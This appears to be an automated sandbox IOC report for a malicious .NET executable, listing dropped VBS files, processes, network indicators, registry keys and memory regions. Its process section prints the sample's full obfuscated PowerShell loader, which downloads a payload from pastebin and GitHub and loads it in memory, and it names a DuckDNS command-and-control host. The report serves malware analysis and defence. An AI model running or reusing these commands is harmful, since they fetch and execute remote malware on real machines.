IOC Report
17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe

loading gif

Files

File Path
Type
Category
Malicious
17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\jglbwx.vbs
Unicode text, UTF-16, little-endian text, with very long lines (857), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\mknrez.vbs
Unicode text, UTF-16, little-endian text, with very long lines (857), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1knd0nyk.ir3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ihy1sfk.lrd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52d2ecu1.3fi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1conrqx.qio.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhxbu4vo.mje.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqoczapk.5od.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kivaelxh.5va.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0sagscj.bic.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otvnkbem.tm3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozxxjsoi.t3f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wndbbfqn.qil.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzgjt5xk.mwp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dll01.txt
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe
"C:\Users\user\Desktop\17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jglbwx.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\mknrez.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?QQBk?HY?OQBn?EI?S?Bh?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bt?Gk?e?Bm?HU?I??9?C??Jw?w?DE?Jw?g?Ds?J?Bi?Gg?c?Bn?GU?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bgB1?Gc?awBr?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?CQ?UQBQ?HQ?YQB2?C4?cgBl?H??b?Bh?GM?ZQ?o?Cc?J??k?CQ?J??k?Cc?L??n?EE?Jw?p?C??KQ?g?Ds?WwBT?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?ZwBr?Gs?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?DQ?MgBv?GM?cwBh?C8?bgBp?GE?bQ?v?HM?Z?Bh?GU?a??v?HM?ZgBl?HI?LwBl?HI?aQBm?C8?YQBs?Gw?aQB1?HE?bgBh?HI?cgBh?GI?N??y?D??MgBu?G8?aQBw?G0?YQBo?GM?LwBt?G8?Yw?u?HQ?bgBl?HQ?bgBv?GM?cgBl?HM?dQBi?HU?a?B0?Gk?Zw?u?Hc?YQBy?C8?Lw?6?HM?c?B0?HQ?a??n?C??L??g?CQ?YgBo?H??ZwBl?C??L??g?Cc?aQBn?GY?e?BF?E0?Ng?0?Cc?L??g?CQ?bQBp?Hg?ZgB1?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\AppData\Local\Temp\mknrez.vbs');powershell $Yolopolhggobek;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?QQBk?HY?OQBn?EI?S?Bh?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?Hc?bgBn?GM?I??9?C??Jw?w?DE?Jw?g?Ds?J?Bl?GE?YQBp?Hc?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?Z?Bj?Gg?cwBp?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?CQ?UQBQ?HQ?YQB2?C4?cgBl?H??b?Bh?GM?ZQ?o?Cc?J??k?CQ?J??k?Cc?L??n?EE?Jw?p?C??KQ?g?Ds?WwBT?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bk?GM?a?Bz?Gk?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?DQ?Mg?x?DE?VgBP?E4?LwBu?Gk?YQBt?C8?cwBk?GE?ZQBo?C8?cwBm?GU?cg?v?GU?cgBp?GY?LwBh?Gw?b?Bp?HU?cQBu?GE?cgBy?GE?Yg?0?DI?M??y?G4?bwBp?H??bQBh?Gg?Yw?v?G0?bwBj?C4?d?Bu?GU?d?Bu?G8?YwBy?GU?cwB1?GI?dQBo?HQ?aQBn?C4?dwBh?HI?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bl?GE?YQBp?Hc?I??s?C??JwBp?Gc?ZgB4?EU?TQ?n?Cw?I??k?Go?dwBu?Gc?Yw?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\AppData\Local\Temp\jglbwx.vbs');powershell $Yolopolhggobek;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$mixfu = '01' ;$bhpge = 'C:\Users\user\AppData\Local\Temp\mknrez.vbs' ;[Byte[]] $nugkk = [system.Convert]::FromBase64String( $QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($nugkk).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('42ocsa/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $bhpge , 'igfxEM64', $mixfu, '1', 'Roda' ));"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jwngc = '01' ;$eaaiw = 'C:\Users\user\AppData\Local\Temp\jglbwx.vbs' ;[Byte[]] $dchsi = [system.Convert]::FromBase64String( $QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dchsi).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('4211VON/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $eaaiw , 'igfxEM', $jwngc, '1', 'Roda' ));"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
154.216.17.204
malicious
saviloe24.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://crl.microsoF0
unknown
https://pastebin.com/raw/adv9gbha
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://pastebin.com/raw/Adv9gBHa
104.20.3.235
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore6
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://pastebin.com
unknown
https://pastebin.com
unknown
https://github.com/Pester/Pester
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
saviloe24.duckdns.org
154.216.17.204
malicious
pastebin.com
104.20.3.235

IPs

IP
Domain
Country
Malicious
154.216.17.204
saviloe24.duckdns.org
Seychelles
malicious
127.0.0.1
unknown
unknown
malicious
104.20.3.235
pastebin.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6D2000
unkown
page readonly
malicious
2AE1000
trusted library allocation
page read and write
malicious
7FFE16890000
trusted library allocation
page read and write
25E9A630000
heap
page read and write
2201F710000
heap
page read and write
1E92CB10000
heap
page read and write
22AD05E0000
heap
page read and write
7FFE16760000
trusted library allocation
page read and write
25E9C760000
trusted library allocation
page read and write
22AD065D000
heap
page read and write
25EB45B0000
heap
page read and write
23518775000
heap
page read and write
7FFE166B1000
trusted library allocation
page read and write
7FFE165D6000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
22AD0780000
trusted library allocation
page read and write
2BDC2820000
heap
page read and write
B45000
heap
page read and write
7FFE16712000
trusted library allocation
page read and write
7FFE166BA000
trusted library allocation
page read and write
2357E0A0000
heap
page read and write
7FFE16860000
trusted library allocation
page read and write
25E9C666000
trusted library allocation
page read and write
2646DB70000
heap
page read and write
7FFE1650D000
trusted library allocation
page execute and read and write
4F6BABF000
stack
page read and write
22AD2517000
trusted library allocation
page read and write
26456C9D000
trusted library allocation
page read and write
7FFE166E2000
trusted library allocation
page read and write
C0CF0BE000
stack
page read and write
7FFE167F0000
trusted library allocation
page read and write
C0CF33E000
stack
page read and write
23500230000
trusted library allocation
page read and write
2357DE5B000
heap
page read and write
22031630000
trusted library allocation
page read and write
7FFE167D0000
trusted library allocation
page read and write
D44CAFE000
stack
page read and write
7FFE16503000
trusted library allocation
page execute and read and write
23500347000
trusted library allocation
page read and write
264555E0000
heap
page execute and read and write
22AE25D9000
trusted library allocation
page read and write
7B7E473000
stack
page read and write
23500702000
trusted library allocation
page read and write
7FFE165D0000
trusted library allocation
page read and write
7FFE166B1000
trusted library allocation
page read and write
22039720000
heap
page read and write
7FFE16504000
trusted library allocation
page read and write
7FFE165E0000
trusted library allocation
page execute and read and write
22AD07A0000
trusted library allocation
page read and write
1BDC95B3000
heap
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
7FFE16774000
trusted library allocation
page read and write
71DE80C000
stack
page read and write
7FFE166E0000
trusted library allocation
page execute and read and write
DDE000
stack
page read and write
7FFE167A6000
trusted library allocation
page read and write
7FFE16830000
trusted library allocation
page read and write
7FFE166C0000
trusted library allocation
page execute and read and write
6C15DFE000
stack
page read and write
22AD392E000
trusted library allocation
page read and write
1BFBA000
stack
page read and write
15FE8020000
heap
page read and write
22AD0860000
heap
page read and write
26453A30000
heap
page read and write
25E9A460000
heap
page read and write
2201F7C0000
heap
page readonly
7FFE16760000
trusted library allocation
page read and write
B6DFA7E000
stack
page read and write
7FFE16620000
trusted library allocation
page execute and read and write
2646DAB7000
heap
page read and write
2351876D000
heap
page read and write
7FFE16730000
trusted library allocation
page read and write
2BDA8754000
heap
page read and write
25EB46B0000
heap
page read and write
7FFE166D0000
trusted library allocation
page read and write
71DD5FD000
stack
page read and write
1E92CAE0000
heap
page read and write
7FFE16700000
trusted library allocation
page read and write
7FFE16850000
trusted library allocation
page read and write
7FFE1652D000
trusted library allocation
page execute and read and write
15FE7D98000
heap
page read and write
71DDB7E000
stack
page read and write
4F6B67E000
stack
page read and write
2646DCBE000
heap
page read and write
25E9A4E6000
heap
page read and write
1B96B000
heap
page read and write
2DC21E20000
heap
page read and write
7FFE165CC000
trusted library allocation
page execute and read and write
1B8DC000
heap
page read and write
2645703F000
trusted library allocation
page read and write
7FFE165DC000
trusted library allocation
page execute and read and write
7FFE166F2000
trusted library allocation
page read and write
22AE235F000
trusted library allocation
page read and write
1B7CD000
stack
page read and write
7FFE16606000
trusted library allocation
page execute and read and write
25E9C3A0000
trusted library allocation
page read and write
18E0AA75000
heap
page read and write
D44CB7E000
stack
page read and write
2BDAA130000
trusted library allocation
page read and write
7FFE16510000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
7FFE16800000
trusted library allocation
page read and write
1BDC93C0000
heap
page read and write
7FFE16880000
trusted library allocation
page read and write
235187D0000
heap
page read and write
7FFE16640000
trusted library allocation
page execute and read and write
1B98B000
heap
page read and write
2203971B000
heap
page read and write
22AD393A000
trusted library allocation
page read and write
26453AA0000
heap
page read and write
264538F0000
heap
page read and write
7FFE16800000
trusted library allocation
page read and write
7FFE16530000
trusted library allocation
page read and write
22AD391E000
trusted library allocation
page read and write
108C000
stack
page read and write
2BDC2803000
heap
page read and write
7FFE16720000
trusted library allocation
page read and write
7FFE16840000
trusted library allocation
page read and write
22AD0612000
heap
page read and write
7B7E6FF000
stack
page read and write
2BDAA0A0000
trusted library allocation
page read and write
C0CF3BE000
stack
page read and write
7FFE16770000
trusted library allocation
page read and write
22AD07D2000
trusted library allocation
page read and write
7FFE165DC000
trusted library allocation
page execute and read and write
235187A3000
heap
page read and write
2201F7D5000
heap
page read and write
7FFE16800000
trusted library allocation
page read and write
15FE9C0A000
heap
page read and write
2BDAA170000
heap
page read and write
7FFE168A0000
trusted library allocation
page read and write
2357DF0A000
heap
page read and write
23510211000
trusted library allocation
page read and write
7FFE16830000
trusted library allocation
page read and write
1BDC96B5000
heap
page read and write
7FFE165D0000
trusted library allocation
page execute and read and write
71DD77E000
stack
page read and write
B6DFC7E000
stack
page read and write
7FFE16870000
trusted library allocation
page read and write
22AD3440000
trusted library allocation
page read and write
15FE7DD0000
heap
page read and write
7FFE1650D000
trusted library allocation
page execute and read and write
2BDAC148000
trusted library allocation
page read and write
D44CF78000
stack
page read and write
2646DB16000
heap
page read and write
220231B9000
trusted library allocation
page read and write
25E9C0A0000
heap
page read and write
208B2960000
heap
page read and write
7B7E57E000
stack
page read and write
7FFE166C2000
trusted library allocation
page read and write
1B944000
heap
page read and write
7B7ECBC000
stack
page read and write
1BDC9545000
heap
page read and write
7FFE16814000
trusted library allocation
page read and write
2645693B000
trusted library allocation
page read and write
2BDA878C000
heap
page read and write
7FFE16520000
trusted library allocation
page read and write
15FEA7FF000
heap
page read and write
208B2A40000
heap
page read and write
7FFE166B0000
trusted library allocation
page read and write
15FE7DD0000
heap
page read and write
B6E0DCB000
stack
page read and write
22AEA9DA000
heap
page read and write
2646DCAC000
heap
page read and write
2BDABE5E000
trusted library allocation
page read and write
23500340000
trusted library allocation
page read and write
B6E0D4F000
stack
page read and write
7FFE167E0000
trusted library allocation
page read and write
26455C80000
trusted library allocation
page read and write
2860000
heap
page read and write
2DC21C20000
heap
page read and write
22AEA68B000
heap
page read and write
25E9C290000
trusted library allocation
page read and write
235186ED000
heap
page read and write
7FFE165C0000
trusted library allocation
page execute and read and write
22AD3948000
trusted library allocation
page read and write
22AE2300000
trusted library allocation
page read and write
7FFE168A0000
trusted library allocation
page read and write
26465661000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
7FFE16880000
trusted library allocation
page read and write
4F6B77F000
stack
page read and write
2BDAA140000
heap
page execute and read and write
15FE7DCF000
heap
page read and write
264556CA000
trusted library allocation
page read and write
15FE7DE6000
heap
page read and write
23500326000
trusted library allocation
page read and write
7FFE16544000
trusted library allocation
page read and write
15FE7E90000
heap
page read and write
2203987F000
heap
page read and write
1B4C0000
heap
page execute and read and write
BE4000
heap
page read and write
7FFE16550000
trusted library allocation
page read and write
7FFE167F0000
trusted library allocation
page read and write
22021610000
heap
page execute and read and write
22021115000
heap
page read and write
D44DC8E000
stack
page read and write
220210D0000
heap
page execute and read and write
26455651000
trusted library allocation
page read and write
7FFE1651B000
trusted library allocation
page read and write
25E9A755000
heap
page read and write
7FFE167C0000
trusted library allocation
page read and write
B6DFE3E000
stack
page read and write
220398BB000
heap
page read and write
7FFE167F0000
trusted library allocation
page read and write
2350056E000
trusted library allocation
page read and write
22039620000
heap
page read and write
7FFE16700000
trusted library allocation
page execute and read and write
2201F56D000
heap
page read and write
264553D0000
trusted library allocation
page read and write
2BDBA501000
trusted library allocation
page read and write
15FE7D70000
heap
page read and write
2BDAA0B0000
heap
page readonly
7FFE16840000
